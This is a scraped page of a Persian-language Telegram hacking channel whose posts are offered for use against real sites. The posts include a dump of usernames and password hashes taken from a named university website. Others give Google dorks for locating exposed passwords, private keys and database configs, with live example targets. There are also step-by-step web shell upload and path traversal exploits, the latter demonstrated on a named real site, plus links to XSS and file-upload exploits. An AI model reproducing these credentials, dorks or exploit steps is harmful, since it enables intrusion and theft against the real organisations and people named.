0Day.Today | Learn Exploit | Zero World | Dark web |


Гео и язык канала: не указан, не указан
Категория: не указана


☝️Iп Tнε Nαмε Oғ GOD☝️
Web Exploiting
& Server Hacking
Shell & Admin panel Access
priv8 Google hacking Dorks
new vul & bugs discovering & Tut
❗️0 day is today❗️
.
0Day.Today
.
insta : IranCyberSec
Cyber security & 0-100 ⇨ @GR4YH4T

Связанные каналы  |  Похожие каналы

Гео и язык канала
не указан, не указан
Категория
не указана
Статистика
Фильтр публикаций


✔️ #ابزار Raccoon برای شناسایی CMS و اسکن آسیب پذیری وبسایت ها

Git: github.com/evyatarmeged/Raccoon

-> برای شناسایی cms میتونید از افزونه wappalyzer برای مرورگرها هم استفاده کنید.

@LearnExploit


#target use/pass members informations
——[
site : https://www.physik.uni-goettingen.de
]——
——[
lqp:jhfapr3fbWp8U
holm:jhSXiXTfj93as
schubert:jhsVTfx2wOORc
bibl:Y63ZMBvMaF1yw
ue:jhFtoinjltENg
buch:qLzG84Izn.8Qc
profile:Aa062OKUQ.n4E
admin:dKXkZY9toouwo
skript:DxVOPnrARlZO6
statphys:zKkE.yM58YQHQ
msdnaa:mQV0tuLa5RfXc
disp0:$apr1$SZJiD7lh$aVJNzX1haaOjW3X/LKnCI.
disp6:$apr1$f1WmW8YJ$IAjTJ0I5RggUukFmoeLo/1
disp7:$apr1$v9m1oACO$7jh69QAXFyAwhlUGY4fa40
disp8:$apr1$dclaXhiu$x0svHZxs.6a3gTXXddERf.
]——




10 متدی که با استفاده از دورک ها میشه username / password اکانت ها رو بدست اورد !
10 #method for get the #user & #pass of #Accounts
—————————
#method_01 :
Dork :
intext:charset_test= email= default_persistent=
/=/=/=/=/=/=/
#method_02 : wordpress
Dork :
filetype:sql inurl:wpcontent/
backup-*
/=/=/=/=/=/=/
#method_03 : WWWBoard!
Dork :
inurl:/wwwboard/passwd.txt
/=/=/=/=/=/=/
#method_04 : FrontPage!
Dork :
ext:pwd inurl:(service | authors | administrators | users) "# -FrontPage-"
/=/=/=/=/=/=/
#method_05 : Symfony!
Dork :
inurl:config/databases.yml -trac -trunk -"Google Code" -source
-repository
/=/=/=/=/=/=/
#method_06 : TeamSpeak!
Dork :
server-dbs "intitle:index of"
/=/=/=/=/=/=/
#method_07 : TeamSpeak2!
Dork :
inurl:Teamspeak2_RC2/server.log
/=/=/=/=/=/=/
#method_08 : Get Admin pass!
Dork :
"admin account info" filetype:log
/=/=/=/=/=/=/
#method_09 : Private keys!
Dork :
filetype:pem pem intext:private
/=/=/=/=/=/=/
#method_10 : The Dir of Passwords!
Dork :
intitle:"Index of..etc" passwd
/=/=/=/=/=/=/
—————————
0Day.Today Bo
y's
@LearnExploit


#Dork - #configuration_php #Pass and #User
—————————
#Dork ~ [
inurl:configuration.php and intext:"var $password="
]
============
#Describtions ~ [
در این دورک میتونید اطلاعاتی از جمله :
/* Database Settings */
var $dbtype = 'mysql'; // Normally mysql
var $host = 'localhost'; // This is normally set to localhost
var $user = '******'; // MySQL username
var $password = '******';// MySQL password
var $db = '******'; // MySQL database name
var $dbprefix = 'jos_'; // Do not change unless you need to!

/* Server Settings */
var $secret = '**********'; //Change this to something more secure
var $gzip = '1';
var $error_reporting = '-1';
var $helpurl = 'help.joomla.org';
var $xmlrpc_server = '1';
var $ftp_host = '';
var $ftp_port = '';
var $ftp_user = '';
var $ftp_pass = '';
var $ftp_root = '';
var $ftp_enable = '';
var $tmp_path = 'home/bukuku/public_html/tmp';
var $log_path = 'home/bukuku/public_html/logs';
var $offset = '0';
var $live_site = 'www.bukulawas.200u.com/'; // Optional, Full url to Joomla install.
var $force_ssl = 0; //Force areas of the site to be SSL ONLY. 0 = None, 1 = Administrator, 2 = Both Site and Administrator
برای نتیجه گیری مورد $user و $password سرچ کنید.
]
============
#example ~ [
http://internationalacademy.in/configuration.php-dist
]
—————————-
0Day.Today Boy's
@LearnExploit


#Dork - #configuration_php #Pass and #User
—————————
0Day.Today Boy's
@LearnExploit


#Dork - #Server Info
—————————
Dork ~ [
inurl:"debug/default/view?panel=config"
]
Describtions ~ [
با این دورک میتونید به اطلاعات یک سرور دسترسی داشته باشید
و حتی در برخی ها اطلاعاتی مانند username/password نیز موجود میباشد.
example ~ [
http://iphone.szczecin.pl/systemnapraw/frontend/web/debug/default/view?tag=5b5ecb5b2cc74&panel=request
]
—————————-
0Day.Today Boy's
@LearnExploit


#Dork - #Server Info
—————————
0Day.Today Boy's
@LearnExploit


Видео недоступно для предпросмотра
Смотреть в Telegram
اموزش کار با ابزار wafw00f در کالی برای تشخیص بودن یا نبودن firewall در سایت
#WaffW00f On #Kalilinux 2018.2
...
@LearnExploit


اموزش کار با ابزار wafw00f در کالی برای تشخیص بودن یا نبودن firewall در سایت
#WaffW00f On #Kalilinux 2018.2
...
@LearnExploit


Bad-Pdf - Steal NTLM Hashes With A PDF From Windows Machines.

[+] GitHub : https://github.com/deepzec/Bad-Pdf

#Uzi
@LearnExploit


اموزش کاتانا ! در کالی لینوکس 2018.2
#Script #Katana OS (#KALI 2018.2)
—————-
در این اموزش یاد میگیرید :
1 - نحوه ی نصب روی کالی
2 - نحوه ی گرفتن whois
3 - پیدا کردن Cpanel
4 - اسنیف شبکه
Time : 7min
Dl link :
http://www.mediafire.com/file/q6b8cc76ysaacdf/katana.rar/file
—————-
0Day.Today Boy's
T.me/LearnExploit


اموزش کاتانا ! در کالی لینوکس 2018.2
#Script #Katana OS (#KALI 2018.2)
—————-
0Day.Today Boy's
T.me/LearnExploit


Upload shell & SQLi :
~~~~~~~~~~~~~~~~~
Dorks#
|~
inurl:"post.php?p_id="
inurl:"/category.php?category="
—————————————-
Exploit#
|~
1 ) ابتدا در سایت ثبت نام کنید
2) وارد پنل خود شید
3) به مسیر /profile برید
4)شل خودتونو با shel.phtml اپلود کنید
5) مسیر شل :
http://[target]/assets/images/profile_pics/your shell.phtml
——————————————
— > @LearnExploit


اسیب پذیری فایل اپلود در پلاگین (Responsive Thumbnail Slider )
WordPress Plugin Responsive Thumbnail Slider - Arbitrary File Upload (Metasploit)
============
Dorks :
inurl:"/wp-content/uploads/wp-responsive-images-thumbnail-slider/"
or
inurl:"/wp-content/plugins/wp-responsive-thumbnail-slider/readme.txt"

exploit :
https://www.exploit-db.com/exploits/45099/

depends :
Metasploit
============
0Day.Today
@LearnExploit


اسیب پذیری فایل اپلود در پلاگین (Responsive Thumbnail Slider )
WordPress Plugin Responsive Thumbnail Slider - Arbitrary File Upload (Metasploit)
============
@LearnExploit


✔️ مکان #اطلاعات_مهم در سیستم لینوکس شما

/etc/resolv.conf
-> سرورهای فعلی (DNS) برای سیستم

/etc/motd
-> پیام روز

/etc/issue
-> نسخه فعلی توزیع لینوکس شما

/etc/passwd
-> فهرست کاربران محلی

/etc/shadow
-> لیست هشهای کلمه عبور کاربران (نیاز به دسترسی روت)

@LearnExploit


اسیب پذیری (FTP2FTP ( Arbitrary File Download :
در این اسیب پذیری شما میتوانید تمام فایل هایی که توسط ادمین سایت اپلود شده است رو دانلود کنید !

Dork : inurl:/download2.php?id=

Exploit :
http(s)://host.com/[patch]?id=../index.php
or
http(s)://host.com/[patch]?id=/index.php

POC :
before exploit :
http://www.supersat.cz/download/azbox/download2.php?id=23
after exploit :
http://www.supersat.cz/download/azbox/download2.php?id=../index.php
=========================
0Dya.Today Boy's
T.me/LearnExploit


اسیب پذیریه XSS در پلاگین (All In One Favicon ) :
#XSS #Multiple #Vul in #wp #plugin #all_In_One_Favicon
—————-
این اسیب پذیری در نسخه های پاین تر از 4.6 به هکر اجازه ی اجرا کردن کد های جاوا اسکریپت رو میده
url : http://localhost/wordpress/wp-admin/options-general.php?page=all-in-one-favicon%2Fall-in-one-favicon.php
==
پارامتر هایی که این اسیب پذیریو دارند :
backendApple-Text
backendICO-Text
backendPNG-Text
backendGIF-Text
frontendApple-Text
frontendICO-Text
frontendPNG-Text
frontendGIF-Text
==
پیلود هایی که برای این اسیب پذیری استفاده میشه :
">
">
==
Exploit link :
https://www.exploit-db.com/exploits/45056/
—————————
0Day.Today Boy's
@LearnExploit


Видео недоступно для предпросмотра
Смотреть в Telegram
POC
اسیب پذیریه XSS در پلاگین (All In One Favicon ) :
#XSS #Multiple #Vul in #wp #plugin #all_In_One_Favicon
0Day.Today Boy's
@LearnExploit

Показано 20 последних публикаций.

214

подписчиков
Статистика канала